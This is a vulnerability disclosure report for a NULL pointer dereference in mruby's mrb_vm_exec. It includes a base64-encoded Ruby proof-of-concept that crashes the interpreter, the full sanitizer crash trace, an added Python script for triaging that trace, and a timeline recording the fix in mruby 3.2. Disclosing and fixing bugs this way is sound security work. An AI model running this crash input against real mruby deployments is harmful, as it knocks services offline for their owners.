NULL Pointer Dereference in mruby/mruby

Valid

Reported on

Mar 7th 2022


Description

There is a NULL Pointer Dereference in mrb_vm_exec (vm.c:1929). This bug was found on the latest mruby commit (hash c2f7ed514dfa0fcae2e7e72d51f25be3d3d6d72c) on Ubuntu 20.04 for x86_64/amd64.

Proof of Concept

1- Clone repo and build with ASAN using MRUBY_CONFIG=build_config/clang-asan.rb rake.

2- Use mruby to execute the poc (it is base64-encoded since it contains unprintable characters):

$ echo -ne 'Yj0iMCIKezA9Pm5pbH0KW11hbmQKYi5jb2RlcG9pbnRze2luc3RhbmNlX2V2YWx7bG9vcC5uZXh0
e30KYi5jb2RlcG9pbnRze0ZpYmVyLm5ld3t9LnRyYW5zZmVyKDAsMCwwLDAsMCwwLDAsMCwwLDAs
MCwwLDAsMCwwKX19fQ==' | base64 -d > poc
$ mruby poc
/home/faraday/mruby/src/vm.c:1929:16: runtime error: member access within misaligned address 0x000000000001 for type 'struct RArray', which requires 8 byte alignment
0x000000000001: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/vm.c:1929:16 in 
AddressSanitizer:DEADLYSIGNAL
=================================================================
==36117==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x0000006f01ea bp 0x7fffb088c190 sp 0x7fffb086aa60 T0)
==36117==The signal is caused by a READ memory access.
==36117==Hint: address points to the zero page.
    #0 0x6f01ea in mrb_vm_exec /home/faraday/mruby/src/vm.c:1929:16
    #1 0x6b0ca9 in mrb_vm_run /home/faraday/mruby/src/vm.c:1130:12
    #2 0x6a5a79 in mrb_top_run /home/faraday/mruby/src/vm.c:3039:12
    #3 0x8b0ef1 in mrb_load_exec /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6890:7
    #4 0x8b2b56 in mrb_load_detect_file_cxt /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6933:12
    #5 0x4c6420 in main /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
    #6 0x7f8c3f9ff0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #7 0x41c85d in _start (/home/faraday/mruby/build/host/bin/mruby+0x41c85d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/vm.c:1929:16 in mrb_vm_exec
==36117==ABORTING
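
One way to triage the sanitizer output above, as an added example that is not part of the original report or of the mruby project: it parses the UBSan and ASan lines copied from this page and relates the `struct RArray` pointer value (0x1) to the faulting read address (0x11), giving a member offset of 0x10. The function name `triage`, the class labels and the 4096-byte page size are assumptions made for the example.

```python
import re

# Sanitizer lines copied verbatim from the report on this page.
REPORT = """\
/home/faraday/mruby/src/vm.c:1929:16: runtime error: member access within misaligned address 0x000000000001 for type 'struct RArray', which requires 8 byte alignment
==36117==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x0000006f01ea bp 0x7fffb088c190 sp 0x7fffb086aa60 T0)
==36117==The signal is caused by a READ memory access.
    #0 0x6f01ea in mrb_vm_exec /home/faraday/mruby/src/vm.c:1929:16
    #1 0x6b0ca9 in mrb_vm_run /home/faraday/mruby/src/vm.c:1130:12
"""

UBSAN_RE = re.compile(r"member access within (?:misaligned )?address (0x[0-9a-f]+) for type '([^']+)'")
SEGV_RE = re.compile(r"AddressSanitizer: SEGV on unknown address (0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"caused by a (READ|WRITE) memory access")
FRAME0_RE = re.compile(r"#0 0x[0-9a-f]+ in (\S+) (\S+)")


def triage(report, page_size=4096):
    """Summarise a UBSan+ASan crash: class, pointer value, member offset, top frame."""
    segv = SEGV_RE.search(report)
    if segv is None:
        raise ValueError("no AddressSanitizer SEGV line found")
    fault = int(segv.group(1), 16)
    ubsan = UBSAN_RE.search(report)
    access = ACCESS_RE.search(report)
    frame = FRAME0_RE.search(report)
    # Without a UBSan line the pointer value is unknown; classify on the fault address.
    base = int(ubsan.group(1), 16) if ubsan else None
    probe = fault if base is None else base
    if probe == 0:
        kind = "null-pointer"
    elif probe < page_size:
        kind = "near-null-pointer"  # small non-zero value used as an object pointer
    else:
        kind = "wild-pointer"
    return {
        "kind": kind,
        "fault_addr": fault,
        "base_ptr": base,
        "pointee_type": ubsan.group(2) if ubsan else None,
        "member_offset": None if base is None else fault - base,
        "access": access.group(1) if access else None,
        "function": frame.group(1) if frame else None,
        "location": frame.group(2) if frame else None,
    }


if __name__ == "__main__":
    for key, value in triage(REPORT).items():
        print(f"{key}: {value}")
```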

Impact

This vulnerability is capable of making the mruby interpreter crash, thus affecting the availability of the system.

Acknowledgements

This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.

We are processing your report and will contact the mruby team within 24 hours. 9 months ago
We have contacted a member of the mruby team and are waiting to hear back 9 months ago
Yukihiro "Matz" Matsumoto validated this vulnerability 9 months ago
octaviogalland has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto marked this as fixed in 3.2 with commit da48e7 9 months ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
This vulnerability will not receive a CVE